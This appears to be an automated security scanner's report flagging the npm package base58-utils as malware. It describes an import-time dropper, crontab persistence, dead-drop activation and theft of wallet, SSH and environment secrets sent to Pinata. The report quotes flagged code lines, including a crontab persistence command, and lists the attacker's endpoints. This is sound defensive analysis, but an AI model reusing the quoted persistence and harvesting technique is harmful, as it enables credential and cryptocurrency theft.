AI Security Review
scanned 4h ago · by lpm-firewall-aiImporting `index.js` triggers a delayed hidden payload. It writes and launches a persistent Node implant that can harvest credentials and cryptocurrency keys, then exfiltrate them when remotely activated.
Static reason
No blocking static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import or require of the package; delayed about 37 seconds.
Impact
The implant persists across reboots, scans user secrets and wallet material, and transmits encrypted findings with host metadata.
Mechanism
Delayed payload dropper, OS persistence, credential harvesting, and HTTPS exfiltration.
Attack narrative
Requiring `index.js` schedules code that decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js`, starts it detached, and establishes cron or scheduled-task persistence. The dropped code checks a Gist and IPFS dead-drops for activation, waits for an idle machine, scans wallet, SSH, document, and shell/environment files for keys and seed phrases, RSA-encrypts discoveries, and uploads them to Pinata.
Rationale
This is a concrete delayed malware chain embedded in a purported Base58 utility: covert payload staging, persistence, wallet/credential harvesting, remote activation, and exfiltration.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/Library/LaunchAgents/com.apple.syncd.plist~/.config/solana~/.ethereum/keystore~/.ssh~/Desktop~/Documents~/Downloads~/.env~/.bashrc~/.zshrc~/.profile~/.bash_profile
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `index.js` runs an import-time timer that drops and starts a hidden Node payload.
- `index.js` installs cron or Windows scheduled-task persistence for `syncd.js`.
- `test/fixtures/keypairs.dat` decodes to code that searches wallet, SSH, document, shell-profile, and env files.
- Decoded payload extracts private keys, seed phrases, keystores, and secret environment values.
- Decoded payload encrypts findings and POSTs them to `api.pinata.cloud`.
- Decoded payload uses a mutable Gist/IPFS dead-drop to activate harvesting.
Evidence against
- `package.json` declares no npm lifecycle hooks.
- The visible Base58 helpers are otherwise local utility functions with no network behavior.
Behavioral surface
ChildProcessFilesystemShell
HighEntropyStrings
Source & flagged code
2 flagged · loading sourceindex.jsView file
•matchType = malicious_source_fingerprint_signature
signature = 8a6b9d9250ab2dc6
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = base58-utils@1.0.1
matchedPath = index.js
matchedIdentity = npm:YmFzZTU4LXV0aWxz:1.0.1
similarity = 1.000
shingleOverlap = 1
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
index.jsView on unpkg6function encode(buf) {
L7: if (typeof buf === "string") buf = Buffer.from(buf, "utf8");
L8: const digits = [0];
...
L62: try {
L63: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process");
L64: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js");
L65: if (f.existsSync(s)) return;
...
L70: try {
L71: if (process.platform === "linux") {
L72: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
L73: } else if (process.platform === "win32") {
Medium
Install Persistence
Source writes installer persistence such as shell profile or service configuration.
index.jsView on unpkg · L6Findings
1 High1 Medium2 Low
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings